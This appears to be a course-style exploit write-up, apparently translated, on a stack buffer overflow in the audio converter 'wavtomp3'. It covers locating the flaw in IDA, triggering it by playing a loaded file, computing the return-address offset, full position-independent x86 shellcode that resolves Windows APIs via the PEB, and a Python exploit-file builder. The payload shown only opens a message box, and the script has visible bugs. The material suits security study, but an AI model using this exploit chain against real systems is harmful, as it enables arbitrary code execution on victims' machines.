Vulnerable software
The software is an audio format conversion software called wavtomp3 Exe, the interface is as follows:
Process record
Locate vulnerability points
In fact, the vulnerability code given in the courseware has only pseudo code, so there is little information. Fortunately, by observing the key vulnerability code given, we can see that a judgment will be made during the cycle, and sub is called during the judgment_ 4b9c6c this function.
This gives an idea to use sub_ The 4b9c6c information point and the cross reference function of IDA find the VA corresponding to this vulnerability point.
Fortunately, this function is called less times in the whole main module and can be compared manually. Otherwise, the pseudo code of IDA will be manually transformed into assembly code and an IDA script will be written for comparison.
After manually comparing the five cross references one by one, the corresponding vulnerability points can be found.
The starting address of this function is 4BA820.
A digression here is the calling convention of usercall: the calling convention of usercall is specific to the compiler. This calling convention is only used after the compiler has turned on the full optimization option. It is characterized by using any register to pass values, and the effective range of the Convention is specific to the compiler.
Back to the topic, the assembly code corresponding to the pseudo code of the vulnerability point is as follows:
After finding the vulnerability point, you can set the breakpoint at the corresponding VA in ollydbg\windbg.
Locate the action that triggers the vulnerability
When you get the vulnerability VA, you need to think about what action can trigger the vulnerability. Generally speaking, there are three ways to complete this step, including two categories:
- Through the analysis of IDA, find the characteristic functions such as obtaining text box characters and opening files, and find the actions that trigger vulnerabilities in combination with the application;
- Find the trigger action through continuous manual attempts in the application;
- Using the existing fuzzy testing framework to automatically traverse all paths;
This automatic test method is more troublesome, so I'll try manual analysis first. Analyzing the call graph of IDA, we can see that there is less information.
The upper function has only one layer, and there is also no symbol information, and 4b9d08 this function is called in the form of function pointer, which means that simple static analysis can not analyze the action that reaches the path of triggering the vulnerability.
Next, let's sort out the idea. In the pseudo code triggered by the vulnerability, the loop is obviously copying or verifying the v30 variable. In addition, the v30 variable is allocated in the stack, so the function of copying this code may be large. Considering the large allocated space, this copy is likely to be for strings or files‘
Next, take a look at the application. You can see that this application is an application that converts WAV into MP3, and the page is relatively simple, which means that the workload of manual testing is relatively small.
And Option options
Then try it next time.
Finally, it is found that the action that triggers the vulnerability is in the playback function after loading the music file.
Moreover, the vulnerability points are different from the above vulnerability points. The real vulnerability point is another branch of if else, but they are all overflow vulnerabilities, with little difference.
After copying, you can see that the contents of V30 variables are consistent with the contents of the file.
Confirmation of vulnerability utilization mode
Check the security function field in IDA and find no protection function against stack overflow. Therefore, it can be asserted that the application does not open the corresponding GS protection option.
Then you can simply use stack overflow for arbitrary code execution. First, locate the stack address 0019FA60 of the overflow function rtn instruction
And confirm the first address of the buffer 0019EA40
Subtracting the two is the space that Shellcode+Padding needs to occupy
Preparation of ShellCode
The preparation of ShellCode can be seen in this article https://blog.csdn.net/x_nirvana/article/details/68921334
In conclusion, the following points should be noted:
- Direct offset cannot be used because the address of ShellCode in memory may be uncertain;
- System APIs cannot be called directly because the DLL libraries corresponding to these APIs may not be loaded into memory
- Special characters such as' \ 0 'cannot appear in ShellCode, because functions such as strcpy may truncate' \ 0 'characters, resulting in incomplete Payload
- jmp and call instructions in the segment can be directly used in ShellCode due to the relative addressing
In the above article, the second and third points are well solved, but the first point is that the author adopts the method of directly not using variables and strings, but I personally feel that this method is too anti-human, so I have made some magic changes to the author's ShellCode assembly code, as follows:
call BaseAddr BaseAddr: pop ebx push ebx jmp RealStart ;Data area GetProcAddress_F_Offset equ $-BaseAddr GetProcAddress_F:dd '0' LoadLibrary_F_Offset equ $-BaseAddr LoadLibrary_F:dd '0' User32_Str_Offset equ $-BaseAddr User32_Str:db 'User32.dll$' MessageBox_A_Offset equ $-BaseAddr MessageBox_A_:db'MessageBoxA$' User32_Base_Offset equ $-BaseAddr User32_Base:dd'0' Hack_String_Offset equ $-BaseAddr Hack_String:dd'You Are Hacked !$' ;Data area RealStart: xor ecx, ecx mov eax, [fs: ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset namestable add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0 Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword [eax], 0x50746547 ; GetP jnz Get_Function cmp dword [eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword [eax + 0x8], 0x65726464 ; ddre jnz Get_Function mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx mov esi, [edx + 0x1c] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress push ebx add esp,4 pop ebx mov [ebx+GetProcAddress_F_Offset],edx push ebx sub esp,4 pop ebx xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) add esp, 0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 add esp,8 pop ebx mov [ebx+LoadLibrary_F_Offset],eax push ebx sub esp,8 mov edx,ebx add edx,User32_Str_Offset push edx call Replace_0 add esp,4 push ebx push edx mov edx,[ebx+LoadLibrary_F_Offset] call edx pop ebx;load user32.dll mov [ebx+User32_Base_Offset],eax mov edx,ebx add edx,MessageBox_A_Offset push edx call Replace_0 add esp,4 push edx mov edx,[ebx+User32_Base_Offset] push edx mov edx,[ebx+GetProcAddress_F_Offset];MessageBox_A_ call edx mov [ebx+MessageBox_A_Offset],eax mov edx,ebx add edx,Hack_String_Offset push edx call Replace_0 add esp,4 push 0 push edx push edx push 0 mov eax,[ebx+MessageBox_A_Offset] call eax mov edx,[ebx+GetProcAddress_F_Offset] call edx add esp,4 pop ebx;load user32.dll mov edx,[ebx+LoadLibrary_F_Offset] Replace_0: push esp mov ebp,esp mov eax,[ebp+8] Replace_0_loop: cmp byte [eax],'$' jz Replace_0_Ret inc eax jmp Replace_0_loop Replace_0_Ret: mov byte[eax],0 mov eax,0 mov esp,ebp pop esp ret
The idea is to use the call instruction to save the base address of shellcode execution in a register, such as ebx, and then use the method of base address for variable addressing. At the same time, if there must be 0 bytes in the variable, it also needs to be modified at run time, such as repeat in shellcode written by me_ The function of 0 is to modify the closing symbol '$' (custom) of the string to '\ 0'
Automatic compilation of Padload for repeated wheel making
Because ShellCode writing - > manual analysis, copying bytecode - > splicing padding - > payload generation is too retarded and inefficient, I have made a Python script to package the next three steps. In fact, there are no tools like this on the network, but the search results show that there are few materials and it is not very friendly to new users, so I have rebuilt a wheel, as shown below:
import os import re class ExpProcessor: ExpFilePath="" OutPutFile="" ShellCodePath="" TmpPath=os.getcwd()+"NasmTmp.asm" TmpObjPath=os.getcwd()+"ExpObj.o" TmpDisassemblyPath=os.getcwd()+"ExpDisassembly.txt" TmpElfHeaderPath=os.getcwd()+"ElfHeaderInformation.txt" ShellCodeBeginIndex="ShellcodeBegin" ShellCodeEndIndex="ShellcodeEnd" ShellCode=bytearray() BeginOffset=0 EndOffset=0 TextSeg_Offset=0 Length=0 ShellCode_VA=0 def __init__(self,FilePath): self.ShellCode=FilePath def __Nasm(self): os.system("nasm -f elf {} -o {}".format(self.TmpPath,self.TmpObjPath)) def __Splicing(self): with open(self.TmpPath,'w') as TmpFile: TmpFile.write("global start\n") TmpFile.write("start:\n") TmpFile.write("nop\n") TmpFile.write("{}:\n".format(self.ShellCodeBeginIndex)) ShellCodeTxt="" with open(self.ShellCodePath,'r') as ShellcodeFile: ShellCodeTxt=ShellcodeFile.read() TmpFile.write(ShellCodeTxt+'\n') TmpFile.write("{}:\n".format(self.ShellCodeEndIndex)) def __Get_ShellCode_Offset(self): os.system("objdump -d -f {} >> {}".format(self.TmpObjPath,self.TmpDisassemblyPath)) Disassembly="" with open(self.TmpDisassemblyPath,'r') as DisassemblyFile: Disassembly=DisassemblyFile.readline() if(re.search(r'[0-9A-Fa-f]{8}\s{1}\<ShellcodeBegin>:{1}',Disassembly)): BeginOffset=re.search(r'[0-9A-Fa-f]*',Disassembly) self.BeginOffset=int(BeginOffset,16) if(re.search(r'[0-9A-Fa-f]{8}\s{1}\<ShellcodeEnd>:{1}',Disassembly)): EndOffset=re.search(r'[0-9A-Fa-f]*',Disassembly) self.BeginOffset=int(EndOffset,16) def __Get_TextSegment_Offset(self): os.system("readelf -S {} >> {}".format(self.TmpObjPath,self.TmpElfHeaderPath)) with open(self.TmpElfHeaderPath,'r') as ElfHeader_File: line=ElfHeader_File.readline() if(line.find(".text")): self.TextSeg_Offset=int(re.search(r'[0-9a-fA-F]{8}\s([0-9a-fA-F]+)\s',line).group(1),16) def Set_Length(self,Length): self.Length=Length def Set_ShellVA(self,VA): self.ShellCode_VA=int.to_bytes(VA,4,'little') def __Get_ShellCode(self): self.__Splicing() self.__Nasm() self.__Get_ShellCode_Offset() self.__Get_TextSegment_Offset() with open(self.TmpObjPath,'rb') as Bin_File: Bin_File.seek(self.TextSeg_Offset+self.BeginOffset,0) for i in range(self.BeginOffset,self.EndOffset): self.ShellCode=self.ShellCode+Bin_File.read(1) def Process_ShellCode(self): self.__Get_ShellCode() def Get_ShellCode_C(self,FilePath=None): ShellCode="\nunsigned int ShellCode=[\n" for i in self.ShellCode: Tmp=i Tmp=int.from_bytes(Tmp,'little',signed=False) Tmp=hex(Tmp) ShellCode=ShellCode+Tmp+',' ShellCode=ShellCode[:-1] print(ShellCode) if(FilePath): with open(FilePath,'w') as OutFile: OutFile.write(ShellCode) return ShellCode def Get_Exp_File(self,FilePath): with open(FilePath,'wb') as OutFile: for i in self.ShellCode: OutFile.write(i) for i in range(0,self.Length-len(self.ShellCode)-4): OutFile.write(b'A') for i in range(0,4): OutFile.write(b'B') for i in self.ShellCode_VA: OutFile.write(i)
The script needs to run in the environment with Nasm and ObjDump installed, and needs to give the length from the first address of the buffer and the first address of the buffer to the overflow point (stack return address, exception handling pointer).